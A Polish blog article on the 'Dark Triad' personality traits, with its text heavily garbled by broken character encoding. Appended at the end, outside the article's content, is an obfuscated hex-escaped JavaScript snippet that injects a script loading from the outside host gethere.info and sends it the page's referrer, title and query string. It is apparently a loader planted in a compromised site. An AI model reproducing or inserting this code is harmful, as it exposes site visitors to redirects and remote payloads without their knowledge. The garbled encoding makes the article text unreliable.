Mroczna Triada osobowoA�ci

opublikowane w Najnowsze Wpisy, Psychologia | 1

Ich znakiem rozpoznawczym jest chciwoA�A� i zakA�amanie. SA� niezwykle A�miali, bez problemu nawiA�zujA� kontakt z obcymi osobami. Bez skrupuA�A?w potrafiA� wykorzystywaA� innych do swoich celA?w, nawet gdy jest to obarczone duA?ym ryzykiem. MajA� A�wietnie opanowanA� sztukA� uwodzenia i sA� przy tym niezwykle czarujA�cya�� Zachwycony sobA� arogant, agresywny brutal czy pragnA�cy wA�adzy za wszelkA� cenA� despota – oto trzy typy spod ciemnej gwiazd,y czyli tzw. Mroczna Triada. Jak rozpoznaA� osoby o mrocznych rysach osobowoA�ci? Jak siA� przed nimi ustrzec?

Kiedy w latach 70. badacze zaczA�li interesowaA� siA� zachowaniami egoistycznymi i bezwzglA�dnymi, wziA�li pod uwagA� skA�onnoA�ci narcystyczne, psychopatyczne i makiaweliczne. Badania z 2002 roku przeprowadzone przez psychologA?w z Univercity of British Columbia pokazaA�y, A?e najbardziej okrutne zachowania moA?na wyjaA�niA� za pomocA� tych trzech rysA?w osobowoA�ci.A�Pierwszym i jednoczeA�nie najbardziej wszystkim znanym czA�onkiem Mrocznej Triady jest narcyz. To osoba prA?A?na, majA�ca skA�onnoA�A� do przeceniania siebie, traktujA�ca innych protekcjonalnie. Ma duA?A� potrzebA� nieustannego podziwu. Aswietnie czuje siA� jako lider, uwielbia bowiem, gdy uwaga skupiona jest na nim. Drugi typ to makiawelista. PojA�cie wywodzi siA� od nazwiska Niccola Machiavellego, autora traktatu o wA�adzy pt. a�zKsiA�A?A�a�?. Makiawelista to osoba egoistyczna, zimna, A?A�dna wA�adzy za wszelkA� cenA�. Zdolna do manipulacji innymi dla osiA�gniA�cia wA�asnych celA?w, niezwaA?ajA�ca na prawo ani zasady moralne. Makiawelista potrafi byA� niezwykle czarujA�cy, przedstawiaA� siA� jako osoba spokojna i peA�na A?yczliwoA�ci. MoA?na go rozpoznaA� takA?e po oportunistycznych i faA�szywych zachowaniach, dziA�ki ktA?rym pnie siA� po szczeblach kariery. Trzeci typ a�� psychopata, podobnie jak makiawelista potrafi przekraczaA� granice bez wzglA�du na prawo czy zasady moralne, jednak jego dziaA�ania sA� bardziej impulsywne, mniej przemyA�lane. Psychopaci potrafiA� byA� agresywni i nie dbajA� o swA?j wizerunek. PosiadajA� zdolnoA�A� dziaA�ania pod presjA� oraz zachowania zimnej krwi w nagA�ych wypadkach. PotrafiA� teA? szybko i bez sentymentA?w podejmowaA� decyzje.

ZaskakujA�cym moA?e wydawaA� siA� fakt, iA? psychologowie sA� zdania, A?e kaA?dy z nas ma w sobie cechy Mrocznej Triady, jednak natA�A?enie tych cech u kaA?dego jest inne i nie musi oznaczaA� zaburzeA� osobowoA�ci.

Badania z 2015 roku przeprowadzone przez dr. Petera Jonasona z Univesity of Western Sydnej w Australii pokazujA�, A?e najwiA�kszym motywatorem dla osA?b z mrocznymi cechami osobowoA�ci jest wA�adza. MakiaweliA�ci i narcyzi pragnA� jej, gdyA? jest dla nich synonimem sukcesu, psychopaci zaA� upatrujA� we wA�adzy A?rA?dA�o przyjemnoA�ci i stymulacji. Badania Nicholasa Holtzmanna pokazujA�, A?e wyglA�d moA?e zdradzaA� mroczne cechy charakteru. Uczestnicy badania mieli za zadanie przyglA�daA� siA� zdjA�ciom twarzy kobiet i mA�A?czyzn, aby wskazaA� twarz z najwiA�kszym nasileniem cech Mrocznej Triady. OkazaA�o siA�, A?e uczestnicy typowali bardzo trafnie. W 2015 roku przeprowadzono inne badanie, w ktA?rym kobiety oceniaA�y wizerunki mA�A?czyzn pod kA�tem atrakcyjnoA�ci. OkazaA�o siA�, A?e kobiety uznawaA�y za najbardziej mA�skie twarze mA�A?czyzn o wysokim nasileniu cech narcystycznych i psychopatycznych.

Mimo A?e z badaA� wynika, iA? kobiety wcale nie chcA� siA� wiA�zaA� z mA�A?czyznami o mrocznej osobowoA�ci, to jednak czA�sto ulegajA� ich fascynacji. Czarne charaktery pozbawione skrupuA�A?w potrafiA� nas czarowaA� i uwodziA�. Ich wysokie poczucie wA�asnej wartoA�ci, nieskrA�powanie i pewnoA�A� siebie mogA� byA� bardzo pociA�gajA�ce. ByA� moA?e wiA�c jest jakaA� prawda w stwierdzeniu, A?e kobiety wolA� a�ztych zA�ycha�?. Jak myA�licie?


 var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}